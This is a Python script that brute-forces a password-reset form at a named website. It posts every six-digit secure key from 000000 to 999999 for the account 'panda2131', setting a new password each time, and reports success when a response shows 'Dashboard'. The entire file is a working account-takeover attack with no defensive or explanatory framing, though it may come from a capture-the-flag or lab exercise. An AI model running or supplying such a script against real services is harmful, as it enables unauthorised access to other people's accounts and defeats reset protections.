import requests

url = "https://sohei.io/reset"

headers = {
    'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36",
    'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
    'Cookie': "stamp=1"
}

# Loop through all 6-digit combinations (000000 to 999999)
for code in range(1000000):
    secure_key = f"{code:06d}"  # Format as 6-digit string
    
    payload = {
        'username': "panda2131",
        'newpass': "GonnaCry1337!!!",
        'confirmpass': "GonnaCry1337!!!",
        'secure_key': secure_key,
        'submit': "true"
    }

    try:
        response = requests.post(url, data=payload, headers=headers)
        if "Dashboard" in response.text:
            print(f"\n[SUCCESS] Valid secure_key found: {secure_key}")
            print("Response:", response.text)
            break
        print(f"Trying: {secure_key} => Status: {response.status_code}", end='\r')
    
    except requests.exceptions.RequestException as e:
        print(f"\nError occurred: {e}")
        continue

print("\nBrute force completed.")
